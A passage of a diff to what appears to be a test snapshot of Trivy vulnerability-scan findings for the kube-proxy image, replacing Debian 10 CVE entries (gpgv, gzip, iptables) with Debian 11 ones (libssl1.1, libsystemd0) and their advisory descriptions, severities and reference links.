"https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.2.12-1+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-34903", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "http://www.openwall.com/lists/oss-security/2022/07/02/1", - "https://access.redhat.com/errata/RHSA-2022:6602", - "https://access.redhat.com/security/cve/CVE-2022-34903", - "https://bugs.debian.org/1014157", - "https://bugzilla.redhat.com/2102868", - "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", - "https://dev.gnupg.org/T6027", - "https://errata.almalinux.org/9/ALSA-2022-6602.html", - "https://errata.rockylinux.org/RLSA-2022:6602", - "https://linux.oracle.com/cve/CVE-2022-34903.html", - "https://linux.oracle.com/errata/ELSA-2022-6602.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", - "https://security.netapp.com/advisory/ntap-20220826-0005/", - "https://ubuntu.com/security/notices/USN-5503-1", - "https://ubuntu.com/security/notices/USN-5503-2", - "https://www.cve.org/CVERecord?id=CVE-2022-34903", - "https://www.debian.org/security/2022/dsa-5174", - "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Signature spoofing via status line injection", + "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-34903", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6602", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-34903", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://bugs.debian.org/1014157", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2102868", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/T6027", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6602", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5174", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6039-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], "severity": "MEDIUM", @@ -153574,77 +153937,77 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-14855", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-14855", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", - "https://dev.gnupg.org/T4755", - "https://eprint.iacr.org/2020/014.pdf", - "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", - "https://rwc.iacr.org/2020/slides/Leurent.pdf", - "https://ubuntu.com/security/notices/USN-4516-1", - "https://usn.ubuntu.com/4516-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-14855", + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "gnupg2: OpenPGP Key Certification Forgeries with SHA-1", + "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-14855", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-14855", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/T4755", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://eprint.iacr.org/2020/014.pdf", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://rwc.iacr.org/2020/slides/Leurent.pdf", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4516-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4516-1/", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-14855", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], "severity": "LOW", @@ -153652,1806 +154015,2029 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3219", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-3219", - "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", - "https://dev.gnupg.org/D556", - "https://dev.gnupg.org/T5993", - "https://marc.info/?l=oss-security&m=165696590211434&w=4", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", - "https://security.netapp.com/advisory/ntap-20230324-0001/", - "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "denial of service issue (resource consumption) using compressed packets", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3219", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3219", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/D556", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5993", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.9-3+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "1.9-3", - "packageName": "gzip", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://bugzilla.redhat.com/2155515", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "iptables", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": 